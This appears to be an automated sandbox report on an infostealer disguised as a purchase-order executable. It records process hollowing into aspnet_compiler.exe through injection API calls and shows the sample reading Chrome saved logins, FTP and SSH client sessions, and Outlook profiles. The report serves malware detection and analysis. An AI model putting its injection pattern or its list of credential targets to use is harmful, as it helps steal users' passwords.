                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, VZclfkIa72LcpRmJj7.csHigh entropy of concatenated method names: 'VZcIlfka7', 'qLcTpRmJj', 'xkDltnICg', 'UsaaaWhiF', 'k8xY0rApkAb9aAEp7i', 'aw02KEvG1BtxHoBaVZ', 'k01pECdR63nKtvdobQ', 'PR9t8H0jnsDqnwTZuR', 'ugRXwjHy330CI8D22A'
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.csHigh entropy of concatenated method names: 'o4SqsBAGQSgEjaYeVjU', 'YCTdiuAPWLdpWCih9Go', 'I3unV0AtiqF8j09r56V', 'Iq2sdcAfdIgPHvWag9C', 'gAklD5KYnn', 'gJtchuAzlViQ7Kfbo7Y', 'K9VRRNvcW3LbYhpa2G3', 'E1Qoa0vjVSvOpQfRToJ', 'bpja2iAS78nFdIDt2Uo', 'NAnS83A6563TT3cVmFf'
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe TID: 3992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6188Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                      Source: aspnet_compiler.exe, 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.000000000435A000.00000004.00000800.00020000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.0000000004220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000040A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.2f10000.0.raw.unpack, BATMAN.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B08008Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeQueries volume information: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
